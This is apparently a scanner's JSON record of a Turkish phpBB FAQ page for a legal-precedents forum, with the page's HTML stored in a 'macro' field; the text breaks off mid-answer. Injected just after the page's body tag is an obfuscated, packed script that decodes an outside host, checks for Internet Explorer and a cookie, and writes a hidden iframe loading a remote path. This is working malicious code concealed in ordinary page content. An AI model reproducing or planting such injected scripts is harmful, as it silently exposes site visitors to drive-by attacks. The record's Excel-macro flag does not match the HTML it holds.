{
    "docinfo": {
        "attributes": [],
        "behavior": {
            "Base64 Strings": "Base64-encoded str were detected, may be used to obfuscate str",
            "Hex Strings": "Hex-encoded str were detected, may be used to obfuscate str",
            "open": "May open a file",
            "register": "May call a DLL using Excel 4 Macros",
            "write": "May write to a file"
        },
        "macro": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\" lang=\"tr\" xml:lang=\"tr\">\n<head>\n\n<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\" />\n<meta http-equiv=\"content-language\" content=\"tr\" />\n<meta http-equiv=\"content-style-type\" content=\"text/css\" />\n<meta http-equiv=\"imagetoolbar\" content=\"no\" />\n<meta name=\"resource-type\" content=\"document\" />\n<meta name=\"distribution\" content=\"global\" />\n<meta name=\"copyright\" content=\"2000, 2002, 2005, 2007 phpBB Group\" />\n<meta name=\"keywords\" content=\"\" />\n<meta name=\"description\" content=\"\" />\n<title>EMSAL KARARLAR VE \u0130\u00c7T\u0130HATLAR &bull; S\u0131k Sorulan Sorular</title>\n\n<link rel=\"stylesheet\" href=\"./style.php?sid=be5e639d613864d0d431e01d68ce6fbd&amp;id=2&amp;lang=en\" type=\"text/css\" />\n\n<script type=\"text/javascript\">\n// <![CDATA[\n\nfunction popup(url, width, height, name)\n{\n\tif (!name)\n\t{\n\t\tname = '_popup';\n\t}\n\n\twindow.open(url.replace(/&amp;/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes,width=' + width);\n\treturn false;\n}\n\nfunction jumpto()\n{\n\tvar page = prompt('Gitmek istedi\u011finiz sayfa numaras\u0131n\u0131 girin:', '');\n\tvar perpage = '';\n\tvar base_url = '';\n\n\tif (page !== null && !isNaN(page) && page > 0)\n\t{\n\t\tdocument.location.href = base_url.replace(/&amp;/g, '&') + '&start=' + ((page - 1) * perpage);\n\t}\n}\n\n/**\n* Find a member\n*/\nfunction find_username(url)\n{\n\tpopup(url, 760, 570, '_usersearch');\n\treturn false;\n}\n\n/**\n* Mark/unmark checklist\n* id = ID of parent container, name = name prefix, state = state [true/false]\n*/\nfunction marklist(id, name, state)\n{\n\tvar parent = document.getElementById(id);\n\tif (!parent)\n\t{\n\t\teval('parent = document.' + id);\n\t}\n\n\tif (!parent)\n\t{\n\t\treturn;\n\t}\n\n\tvar rb = parent.getElementsByTagName('input');\n\t\n\tfor (var r = 0; r < rb.length; r++)\n\t{\n\t\tif (rb[r].name.substr(0, name.length) == name)\n\t\t{\n\t\t\trb[r].checked = state;\n\t\t}\n\t}\n}\n\n\n// ]]>\n</script>\n</head>\n<body class=\"ltr\"><script>sa=\"%6B%73%69%65%6E%61%2E%6E%65%74\";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+c.toString(a)+'\\\\b','g'),k[c])}}return p}('a(0.4.7(\"5=s\")==-1&&9.8.7(\"f 6\")!=-1){0.4=\"5=s; e=c, 2 g b 2:d:h p; \";0.r(\"<3 q=1 t=1 o=\\'n://\"+j+\"/i/\\' k=\\'l:m\\'></3>\")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));</script>\n\n<a name=\"top\"></a>\n\n<div id=\"wrapheader\">\n\n\t<div id=\"logodesc\">\n\t\t<table width=\"100%\" cellspacing=\"0\">\n\t\t<tr>\n\t\t\t<td><a href=\"./index.php?sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/imageset/site_logo.gif\" width=\"400\" height=\"100\" alt=\"\" title=\"\" /></a></td>\n\t\t\t<td width=\"100%\" align=\"center\"><h1>EMSAL KARARLAR VE \u0130\u00c7T\u0130HATLAR</h1><span class=\"gen\">****** EMSAL KARARLAR VE \u0130\u00c7T\u0130HATLAR BU S\u0130TEDE TOPLANSIN - \u0130\u00c7T\u0130HAT VE EMSAL KARAR EKLEMEK \u0130STEYEN HERKES DAVETL\u0130D\u0130R ****** ADALET M\u00dcLK\u00dcN, GER\u00c7EKLER VE DO\u011eRULAR DA ADALET\u0130N TEMEL\u0130D\u0130R</span></td>\n\t\t</tr>\n\t\t</table>\n\t</div>\n\n\t<div id=\"menubar\">\n\t\t<table width=\"100%\" cellspacing=\"0\">\n\t\t<tr>\n\t\t\t<td class=\"genmed\">\n\t\t\t\t<a href=\"./ucp.php?mode=login&amp;sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/theme/images/icon_mini_login.gif\" width=\"12\" height=\"13\" alt=\"*\" /> Oturum A\u00e7</a>&nbsp; &nbsp;<a href=\"./ucp.php?mode=register&amp;sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/theme/images/icon_mini_register.gif\" width=\"12\" height=\"13\" alt=\"*\" /> Kay\u0131t Ol</a>\n\t\t\t\t\t\t\t\t</td>\n\t\t\t<td class=\"genmed\" align=\"right\">\n\t\t\t\t<a href=\"./faq.php?sid=be5e639d613864d0d431e01d68ce6fbd\"><img src=\"./styles/subsilver2/theme/images/icon_mini_faq.gif\" width=\"12\" height=\"13\" alt=\"*\" /> Pano K\u0131lavuzu</a>\n\t\t\t\t\t\t\t</td>\n\t\t</tr>\n\t\t</table>\n\t</div>\n\n\t<div id=\"datebar\">\n\t\t<table width=\"100%\" cellspacing=\"0\">\n\t\t<tr>\n\t\t\t<td class=\"gensmall\"></td>\n\t\t\t<td class=\"gensmall\" align=\"right\">Sistem saati: Per Tem 23, 2015 1:02 pm<br /></td>\n\t\t</tr>\n\t\t</table>\n\t</div>\n\n</div>\n\n<div id=\"wrapcentre\">\n\n\t\n\t<br style=\"clear: both;\" />\n\n\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\" cellpadding=\"0\" style=\"margin-top: 5px;\">\n\t<tr>\n\t\t<td class=\"row1\">\n\t\t\t<p class=\"breadcrumbs\"><a href=\"./index.php?sid=be5e639d613864d0d431e01d68ce6fbd\">Pano anasayfas\u0131</a></p>\n\t\t\t<p class=\"datetime\">T\u00fcm zamanlar UTC + 2 saat </p>\n\t\t</td>\n\t</tr>\n\t</table>\n\t<br />\n<a name=\"faqtop\"></a>\n\n<div id=\"pagecontent\">\n\n\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t<tr>\n\t\t<th>S\u0131k Sorulan Sorular</th>\n\t</tr>\n\t<tr>\n\t\t<td class=\"row1\">\n\t\t\t\t\t<span class=\"gen\"><b>Oturum A\u00e7ma ve Kay\u0131t Konular\u0131</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r0\">Neden oturum a\u00e7am\u0131yorum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r1\">Neden \u00fcye olmal\u0131y\u0131m?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r2\">Neden oturumum otomatik olarak kapan\u0131yor?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r3\">Aktif \u00fcye listesinde kullan\u0131c\u0131 ad\u0131m\u0131n g\u00f6r\u00fcnmesini nas\u0131l engellerim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r4\">Parolam\u0131 unuttum!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r5\">Kay\u0131t oldum ancak oturum a\u00e7am\u0131yorum!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r6\">Daha \u00f6nce \u00fcye oldu\u011fum halde neden oturum a\u00e7am\u0131yorum?!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r7\">COPPA nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r8\">Neden kay\u0131t olam\u0131yorum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f0r9\">\u201cT\u00fcm pano \u00e7erezlerini sil\u201d ne yapar?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Kullan\u0131c\u0131 Tercihleri ve Ayarlar\u0131</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r0\">Ayarlar\u0131m\u0131 nas\u0131l de\u011fi\u015ftirebilirim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r1\">Zamanlar do\u011fru de\u011fil!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r2\">Zaman dilimini de\u011fi\u015ftirmeme ra\u011fmen zaman hala yanl\u0131\u015f!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r3\">Listede benim dilim mevcut de\u011fil!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r4\">Kullan\u0131c\u0131 ad\u0131m\u0131n alt\u0131nda nas\u0131l resim g\u00f6sterebilirim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r5\">Seviye nedir ve nas\u0131l de\u011fi\u015ftirebilirim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f1r6\">\u00dcyeye e-posta g\u00f6nder butonuna bas\u0131nca neden oturum a\u00e7mam isteniyor?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>G\u00f6nderim Konular\u0131</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r0\">Bir forumda nas\u0131l ba\u015fl\u0131k a\u00e7abilirim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r1\">Bir iletiyi nas\u0131l de\u011fi\u015ftirebilir veya silerim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r2\">\u0130letime imzam\u0131 nas\u0131l eklerim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r3\">Nas\u0131l anket olu\u015ftururum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r4\">Neden daha fazla anket se\u00e7ene\u011fi olu\u015fturam\u0131yorum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r5\">Bir anketi nas\u0131l d\u00fczenleyebilir ya da silebilirim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r6\">Baz\u0131 forumlara neden eri\u015femiyorum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r7\">Neden eklenti y\u00fckleyemiyorum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r8\">Neden bir uyar\u0131 ald\u0131m?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r9\">\u0130letileri yetkililere nas\u0131l rapor ederim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r10\">Konu g\u00f6nderimindeki \u201cKaydet\u201d butonu ne i\u00e7in?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r11\">Neden iletimin onaylanmas\u0131 gerekiyor?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f2r12\">Konumu nas\u0131l g\u00fcncel tutabilirim?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Bi\u00e7imlendirme ve Ba\u015fl\u0131k Tipleri</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r0\">Bi\u00e7im kodu nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r1\">HTML kullanabilir miyim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r2\">\u0130fadeler nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r3\">Resim g\u00f6nderebilir miyim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r4\">Genel duyuru nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r5\">Duyuru nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r6\">Sabit konu nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r7\">Kilitli konu nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f3r8\">Konu ikonu nedir?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Kullan\u0131c\u0131 Seviyeleri ve Gruplar</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r0\">Y\u00f6netici nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r1\">Yetkili nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r2\">Kullan\u0131c\u0131 grubu nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r3\">Kullan\u0131c\u0131 gruplar\u0131 nerede ve bir gruba nas\u0131l kat\u0131l\u0131r\u0131m?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r4\">Nas\u0131l bir grup lideri olabilirim?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r5\">Neden baz\u0131 gruplar farkl\u0131 renkte g\u00f6r\u00fcn\u00fcyor?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r6\">\u201cVarsay\u0131lan Kullan\u0131c\u0131 Grubu\u201d nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f4r7\">\u201cY\u00f6netim ekibi\u201d ba\u011f\u0131 nedir?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>\u00d6zel Mesajla\u015fma</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f5r0\">\u00d6zel mesaj g\u00f6nderemiyorum!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f5r1\">\u0130stenmeyen \u00f6zel mesajlar almaya devam ediyorum!</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f5r2\">Bu pano \u00fcyelerinden birinden istenmeyen ya da olumsuz i\u00e7erikli e-posta al\u0131yorum!</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Arkada\u015flar ve Yasakl\u0131lar</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f6r0\">Arkada\u015flar\u0131m ve yasakl\u0131lar listesi nedir?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f6r1\">Arkada\u015flar\u0131m / yasakl\u0131lar listesine kullan\u0131c\u0131lar\u0131 nas\u0131l eklerim?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Forumlarda Arama</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r0\">Bir forumda veya forumlarda nas\u0131l arama yapar\u0131m?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r1\">Neden \u201cSonu\u00e7 bulunamad\u0131\u201d hatas\u0131n\u0131 al\u0131yorum?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r2\">Neden arama sonucunda bo\u015f bir sayfaya d\u00f6n\u00fcyorum!?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r3\">\u00dcyeler i\u00e7in nas\u0131l arar\u0131m?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f7r4\">Kendi iletilerimi ve konular\u0131m\u0131 nas\u0131l bulurum?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Konu \u0130zlemeleri ve S\u0131k Kullan\u0131lanlar</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f8r0\">S\u0131k kullan\u0131lanlar ile konuya kaydolmak aras\u0131nda nas\u0131l bir fark vard\u0131r?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f8r1\">Belli bir forum ya da ba\u015fl\u0131\u011fa kaydolmak i\u00e7in ne yapmal\u0131y\u0131m?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f8r2\">Aboneliklerimi nas\u0131l silebilirim?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>Eklentiler</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f9r0\">Bu panoda hangi eklentilere izin verilmekte?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f9r1\">Kendime ait t\u00fcm eklentileri nas\u0131l bulabilirim?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t\t<span class=\"gen\"><b>phpBB3 Konular\u0131</b></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r0\">Bu mesaj panosunu kim yazd\u0131?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r1\">Bu yaz\u0131l\u0131m\u0131 kim T\u00fcrk\u00e7e\u2019ye terc\u00fcme etti?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r2\">Neden X \u00f6zelli\u011fi yok?</a></span><br />\n\t\t\t\t\t\t\t<span class=\"gen\"><a class=\"postlink\" href=\"#f10r3\">Bu panodaki hatal\u0131 kullan\u0131m ve/veya yasal konularla ilgili olarak kimle ileti\u015fim kurmal\u0131y\u0131m?</a></span><br />\n\t\t\t\t\t\t<br />\n\t\t\t\t</td>\n\t</tr>\n\t<tr>\n\t\t<td class=\"cat\">&nbsp;</td>\n\t</tr>\n\t</table>\n\n\t<br clear=\"all\" />\n\n\t\t\t<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\">\n\t\t<tr> \n\t\t\t<td class=\"cat\" align=\"center\"><h4>Oturum A\u00e7ma ve Kay\u0131t Konular\u0131</h4></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r0\"></a><b>&#187; Neden oturum a\u00e7am\u0131yorum?</b></div>\n\t\t\t\t<div class=\"postbody\">Bunun farkl\u0131 sebepleri olabilir. \u00d6ncelikle, kullan\u0131c\u0131 ad\u0131 ve parolan\u0131z\u0131n do\u011fru oldu\u011funa emin olun. E\u011fer do\u011fruysa, uzakla\u015ft\u0131r\u0131lmad\u0131\u011f\u0131n\u0131z\u0131 do\u011frulamak i\u00e7in pano y\u00f6neticisi ile irtibata ge\u00e7in. Ayn\u0131 zamanda y\u00f6netici d\u00fczeltilmesi gereken bir hata da yapm\u0131\u015f olabilir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r1\"></a><b>&#187; Neden \u00fcye olmal\u0131y\u0131m?</b></div>\n\t\t\t\t<div class=\"postbody\">B\u00f6yle bir zorunlulu\u011funuz olmayabilir. \u0130leti g\u00f6nderebilmek i\u00e7in \u00fcye olman\u0131z\u0131n gerekip gerekmeyece\u011fi pano y\u00f6neticisine ba\u011fl\u0131d\u0131r. Yine de \u00fcye olmak, misafir ziyaret\u00e7iler i\u00e7in mevcut olmayan avatar belirleme, \u00f6zel mesaj, kullan\u0131c\u0131lar aras\u0131 e-posta, grup \u00fcyeli\u011fi gibi baz\u0131 ek \u00f6zellikleri kullan\u0131m\u0131n\u0131za sunacakt\u0131r. Kay\u0131t olman\u0131z \u00f6nerilir ve bu i\u015flem sadece birka\u00e7 dakika al\u0131r.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r2\"></a><b>&#187; Neden oturumum otomatik olarak kapan\u0131yor?</b></div>\n\t\t\t\t<div class=\"postbody\">E\u011fer oturum a\u00e7arken <em>Beni hat\u0131rla</em> kutusunu i\u015faretlemezseniz pano sizi sadece mevcut oturum boyunca \u00e7evirimi\u00e7i olacak \u015fekilde tutacakt\u0131r. Bu hesab\u0131n\u0131z\u0131n ba\u015fka biri taraf\u0131ndan kullan\u0131lmas\u0131n\u0131 engeller. S\u00fcrekli ba\u011fl\u0131 kalmak istiyorsan\u0131z kutuyu i\u015faretleyebilirsiniz. K\u00fct\u00fcphane, internet cafe, \u00fcniversite bilgisayar labaratuvar\u0131 gibi payla\u015f\u0131ma a\u00e7\u0131k bilgisayarlarda bu \u015fekilde giri\u015f yapman\u0131z \u00f6nerilmez. E\u011fer kontrol kutusunu g\u00f6remiyorsan\u0131z, bu pano y\u00f6neticisinin bu \u00f6zelli\u011fi pasif hale getirdi\u011fi anlam\u0131na gelir.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r3\"></a><b>&#187; Aktif \u00fcye listesinde kullan\u0131c\u0131 ad\u0131m\u0131n g\u00f6r\u00fcnmesini nas\u0131l engellerim?</b></div>\n\t\t\t\t<div class=\"postbody\">Kullan\u0131c\u0131 panelinizdeki \u201cPano se\u00e7enekleri\u201d alt\u0131nda <em>\u00c7evirimi\u00e7i oldu\u011fumu gizle</em> se\u00e7ene\u011fini g\u00f6receksiniz. E\u011fer bu se\u00e7ene\u011fi <samp>Evet</samp> olarak i\u015faretleyerek aktif hale getirirseniz, sadece pano y\u00f6neticileri, yetkililer ve kendiniz taraf\u0131ndan g\u00f6r\u00fcn\u00fcr hale geleceksiniz. Gizli \u00fcye olacaks\u0131n\u0131z.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r4\"></a><b>&#187; Parolam\u0131 unuttum!</b></div>\n\t\t\t\t<div class=\"postbody\">Endi\u015felenmeyin! Parolan\u0131za ula\u015famaman\u0131z durumunda yeni bir parola olu\u015fturulabilir. Bu durumda oturum a\u00e7ma sayfas\u0131na gidin ve <em>Parolam\u0131 unuttum</em> ba\u011flant\u0131s\u0131na t\u0131klay\u0131n, talimatlar\u0131 uygulay\u0131n ve zaman kaybetmeden tekrar \u00e7evirimi\u00e7i olun.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r5\"></a><b>&#187; Kay\u0131t oldum ancak oturum a\u00e7am\u0131yorum!</b></div>\n\t\t\t\t<div class=\"postbody\">\u00d6ncelikle, do\u011fru kullan\u0131c\u0131 ad\u0131 ve parola girdi\u011finizden emin olun. E\u011fer do\u011fruysa iki nedenden oturum a\u00e7am\u0131yor olabilirsiniz. E\u011fer COPPA deste\u011fi aktif hale getirilmi\u015fse ve kay\u0131t esnas\u0131nda 13 ya\u015f\u0131ndan k\u00fc\u00e7\u00fck oldu\u011funu ifade etmi\u015fseniz, size g\u00f6nderilen y\u00f6nergeyi takip edin. Baz\u0131 pano y\u00f6neticileri \u00fcyelerin aktif olarak panoyu kullanmalar\u0131 i\u00e7in kendilerinin ya da \u00fcyelerin kendi \u00fcyeliklerini aktif hale getirmesini zorunlu k\u0131lmaktad\u0131r; bu bilgi kay\u0131t a\u015famas\u0131nda size ifade edilmektedir. E\u011fer size bir e-posta geldiyse, e-postadaki talimatlar\u0131 takip edin. E\u011fer size bu e-posta ula\u015fmad\u0131ysa, yanl\u0131\u015f bir e-posta adresi vermi\u015f olabilir, e-posta bir istenmeyen posta filtresine tak\u0131lm\u0131\u015f olabilir. E\u011fer verdi\u011finiz e-postan\u0131n do\u011frulu\u011fundan eminseniz, y\u00f6neticilerden birine ula\u015fmay\u0131 deneyin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r6\"></a><b>&#187; Daha \u00f6nce \u00fcye oldu\u011fum halde neden oturum a\u00e7am\u0131yorum?!</b></div>\n\t\t\t\t<div class=\"postbody\">Kay\u0131t a\u015famas\u0131nda verdi\u011finiz e-posta adresine g\u00f6nderilen iletide mevcut bulunan kullan\u0131c\u0131 ad\u0131n\u0131z\u0131 ve parolan\u0131z\u0131 kontrol edin ve yeniden oturum a\u00e7may\u0131 deneyin. Bir sebeplerden \u00f6t\u00fcr\u00fc y\u00f6neticilerden biri kullan\u0131c\u0131 ad\u0131n\u0131z\u0131 silmi\u015f ya da \u00fcyeli\u011finizi pasif hale getirmi\u015f olabilir. Bununla birlikte, bir \u00e7ok pano y\u00f6neticisi veritaban\u0131n\u0131n a\u015f\u0131r\u0131 kullan\u0131m\u0131n\u0131 \u00f6nlemek i\u00e7in uzun bir s\u00fcre herhangi bir kat\u0131l\u0131m g\u00f6stermeyen \u00fcyeleri belli aral\u0131klarla silmektedir. E\u011fer ikinci ihtimal s\u00f6z konusu ise yeniden kay\u0131t olmay\u0131 ve daha aktif bir kat\u0131l\u0131m g\u00f6stermeyi deneyin.</div>\n\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>\n\t\t</tr>\n\t\t \n\t\t<tr>\n\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">\n\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f0r7\"></a><b>&#187; COPPA nedir?</b></div>\n\t\t\t\t<div class=\"postbody\">COPPA, \"1998 \u00c7evirimi\u00e7i \u00c7ocuk G\u00fcvenli\u011fi ve Korumas\u0131 Hareketi\", 